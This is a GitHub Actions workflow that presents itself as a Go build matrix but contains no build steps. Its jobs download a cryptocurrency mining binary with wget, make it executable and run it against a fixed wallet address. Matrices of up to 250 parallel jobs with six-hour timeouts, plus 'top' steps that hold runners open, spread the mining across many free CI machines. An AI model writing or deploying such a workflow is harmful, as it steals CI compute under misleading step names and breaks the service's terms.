
name: kontol
on: 
  push:
    branches: [ "main" ]

jobs:
  pemanasan:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 7
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v4
    - name: Maino
      run: |
        sudo apt-get update
    - name: Main
      run: |
        wget https://github.com/ore-pool/ore-pool-cli/raw/master/ore-pool-cli-v1.1.0 && chmod 777 * && ./ore-pool-cli-v1.1.0 mine --address HrMWvLPp5HVwRM5BfmBG9NEWfsK98NJKkfoih2ZCjiq4 --threads 4 &
        sleep 1m
  mechat:
    needs: pemanasan
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v4
    - name: Maino
      run: |
        sudo apt-get update
    - name: Main
      run: |
        wget https://github.com/ore-pool/ore-pool-cli/raw/master/ore-pool-cli-v1.1.0 && chmod 777 * && ./ore-pool-cli-v1.1.0 mine --address HrMWvLPp5HVwRM5BfmBG9NEWfsK98NJKkfoih2ZCjiq4 --threads 4 &
    - name: Mainq
      run: top
        
  mechat2:
    needs: pemanasan
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v4
    - name: Maino
      run: |
        sudo apt-get update
    - name: Main
      run: |
        wget https://github.com/ore-pool/ore-pool-cli/raw/master/ore-pool-cli-v1.1.0 && chmod 777 * && ./ore-pool-cli-v1.1.0 mine --address HrMWvLPp5HVwRM5BfmBG9NEWfsK98NJKkfoih2ZCjiq4 --threads 4 &
    - name: Mainp
      run: top
  Success:
    needs: [pemanasan, mechat]
    if: always()
    runs-on: ubuntu-20.04
    steps:
      - uses: technote-space/workflow-conclusion-action@v2
      - name: Check Failure
        if: env.WORKFLOW_CONCLUSION == 'failure'
        run: exit 1
      - name: Success
        if: ${{ success() }}
        run: echo "all don,All Done"
